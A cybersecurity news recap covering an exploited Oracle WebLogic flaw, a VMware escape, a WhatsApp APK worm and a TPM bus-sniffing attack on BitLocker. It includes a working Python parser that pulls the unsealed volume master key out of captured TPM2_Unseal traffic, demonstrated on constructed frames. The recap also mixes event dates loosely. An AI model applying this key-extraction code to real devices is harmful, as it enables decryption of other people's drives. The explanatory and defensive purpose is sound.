This week in cybersecurity, researchers and threat actors brought several critical issues to light: active exploitation of an Oracle zero-day vulnerability, a physical attack that recovers BitLocker keys from the TPM bus, a virtual machine escape, and worm-like malware spreading through WhatsApp.
These events underscore the breadth of threats facing enterprise systems and end users, with vulnerabilities spanning from server infrastructure to personal messaging apps. Each finding is a confirmed risk: either demonstrated by researchers or exploited in the wild.
Critical Infrastructure and System Vulnerabilities
An Oracle WebLogic Server zero-day vulnerability, tracked as CVE-2023-21931, was observed being actively exploited by threat actors. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added it to its Known Exploited Vulnerabilities (KEV) catalog, confirming ongoing attacks. The flaw lies in the server's Remote Method Invocation (RMI) interface and lets an unauthenticated attacker achieve remote code execution on affected servers. It was exploited as a zero-day, that is, before a patch was available; organizations running WebLogic should apply the vendor fix and, in the meantime, restrict network exposure of the RMI and related T3/IIOP listeners to trusted hosts.
In the physical security domain, a new technique for bypassing BitLocker drive encryption was demonstrated. The attack requires physical access to the target device and uses a logic analyzer costing around $10 to sniff the bus between a standalone (discrete) Trusted Platform Module (TPM) and the CPU. When BitLocker is configured with a TPM-only protector, the TPM unseals the volume master key (VMK) at boot and returns it to the CPU in cleartext, so anyone tapping the bus can read it and decrypt the drive. Researchers used this method to decrypt data on multiple laptops. The weakness is specific to configurations with a discrete TPM and no pre-boot authentication: a TPM+PIN protector prevents the unseal until the PIN is entered, and a firmware TPM integrated into the CPU does not expose the exchange on an external bus.
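To make the bus-sniffing point concrete, the following added example (written for this page, not code from the article or from the researchers) parses a TPM 2.0 command/response exchange the way a sniffer would, locates a TPM2_Unseal command, and pulls the unsealed blob out of the response. Command codes, tags and the marshalling layout follow the TPM 2.0 Library specification; the frames, the session bytes and the 32-byte "key" are constructed for the example and are not a real capture.

```python
"""
Added example: recover a sealed secret from a sniffed TPM 2.0 exchange.

A discrete TPM talks to the CPU over LPC or SPI. A TPM2_Unseal response
carries outData as a TPM2B_SENSITIVE_DATA; unless the caller negotiated
parameter encryption, that data is plaintext on the bus. For BitLocker with
a TPM-only protector, outData is the volume master key (VMK).

All frames below are constructed for this example, not a real capture.
"""
import struct
from typing import List, Optional

TPM_ST_NO_SESSIONS = 0x8001   # tag: no authorization area
TPM_ST_SESSIONS = 0x8002      # tag: authorization area present
TPM_CC_UNSEAL = 0x0000015E    # TPM2_Unseal command code
TPM_CC_GETRANDOM = 0x0000017B  # TPM2_GetRandom, used as a decoy frame
TPM_RC_SUCCESS = 0x00000000

HEADER = struct.Struct(">HII")  # tag, size, commandCode / responseCode


def build_frame(tag: int, code: int, body: bytes) -> bytes:
    """Prefix a body with the 10-byte TPM header; size covers the whole frame."""
    return HEADER.pack(tag, HEADER.size + len(body), code) + body


def build_unseal_command(object_handle: int, session: bytes) -> bytes:
    """TPM2_Unseal: one object handle, then authorizationSize and the auth area."""
    body = struct.pack(">I", object_handle) + struct.pack(">I", len(session)) + session
    return build_frame(TPM_ST_SESSIONS, TPM_CC_UNSEAL, body)


def build_unseal_response(out_data: bytes, auth_resp: bytes) -> bytes:
    """TPM2_Unseal response: parameterSize, TPM2B outData, then the auth response."""
    params = struct.pack(">H", len(out_data)) + out_data
    body = struct.pack(">I", len(params)) + params + auth_resp
    return build_frame(TPM_ST_SESSIONS, TPM_RC_SUCCESS, body)


def is_unseal_command(frame: bytes) -> bool:
    """True if the frame is a well-formed command whose code is TPM2_Unseal."""
    if len(frame) < HEADER.size:
        return False
    _tag, size, code = HEADER.unpack_from(frame)
    return size == len(frame) and code == TPM_CC_UNSEAL


def extract_unsealed_data(frame: bytes) -> Optional[bytes]:
    """Return outData from a successful TPM2_Unseal response, else None."""
    if len(frame) < HEADER.size:
        return None
    tag, size, rc = HEADER.unpack_from(frame)
    if size != len(frame) or rc != TPM_RC_SUCCESS:
        return None
    off = HEADER.size
    if tag == TPM_ST_SESSIONS:
        off += 4                      # skip UINT32 parameterSize
    elif tag != TPM_ST_NO_SESSIONS:
        return None
    if len(frame) < off + 2:
        return None
    (n,) = struct.unpack_from(">H", frame, off)
    data = frame[off + 2:off + 2 + n]
    return data if len(data) == n else None


def recover_keys_from_capture(frames: List[bytes]) -> List[bytes]:
    """Walk alternating command/response frames and collect every unsealed blob."""
    keys, waiting = [], False
    for frame in frames:
        if not waiting:
            waiting = is_unseal_command(frame)   # command frame
        else:
            data = extract_unsealed_data(frame)  # response to the Unseal
            if data is not None:
                keys.append(data)
            waiting = False
    return keys


# Constructed capture: a GetRandom exchange, then the Unseal that leaks the key.
DUMMY_VMK = bytes(range(32))  # stand-in for the VMK; not a real key
# TPMS_AUTH_COMMAND for a policy session: handle, empty nonce, attrs=0, empty hmac
POLICY_AUTH = struct.pack(">I", 0x03000000) + b"\x00\x00" + b"\x00" + b"\x00\x00"
# TPMS_AUTH_RESPONSE: empty nonce, attrs=0, empty hmac
POLICY_AUTH_RESP = b"\x00\x00" + b"\x00" + b"\x00\x00"

CAPTURE = [
    build_frame(TPM_ST_NO_SESSIONS, TPM_CC_GETRANDOM, struct.pack(">H", 8)),
    build_frame(TPM_ST_NO_SESSIONS, TPM_RC_SUCCESS, b"\x00\x08" + b"\xaa" * 8),
    build_unseal_command(0x80000000, POLICY_AUTH),
    build_unseal_response(DUMMY_VMK, POLICY_AUTH_RESP),
]

if __name__ == "__main__":
    for key in recover_keys_from_capture(CAPTURE):
        print("unsealed data on the bus:", key.hex())
```

The decoy GetRandom frames show that the sniffer only needs to match on the command code; nothing in the unseal response marks the payload as sensitive. On a Windows machine, `manage-bde -protectors -get C:` (or the `Get-BitLockerVolume` cmdlet's KeyProtector list in PowerShell) shows whether the OS volume relies on a bare TPM protector or on TPM+PIN.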
Threats Targeting Virtual Environments and Messaging Platforms
Researchers at the Pwn2Own Vancouver 2023 competition demonstrated a virtual machine escape against VMware Workstation. The exploit chain combined two distinct vulnerabilities, a use-after-free bug and an uninitialized-variable flaw, to execute code on the host operating system from inside a guest virtual machine. The demonstration was a complete guest-to-host escape on a fully patched system.
A malware campaign dubbed "WhatsApp Pink" was reported to be spreading among users. It propagates through links shared in WhatsApp groups that promise a pink-themed version of the app. Once a user installs the malicious APK, it requests permissions that let it read contact data and automatically sends messages carrying the same download link to the victim's contacts, producing a worm-like spread. Its primary function is data exfiltration from compromised devices. Installing apps only from the official store and declining sideloaded APKs sent over chat cuts off this propagation path.
Source: https://thehackernews.com/2025/10/weekly-recap-oracle-0-day-bitlocker.html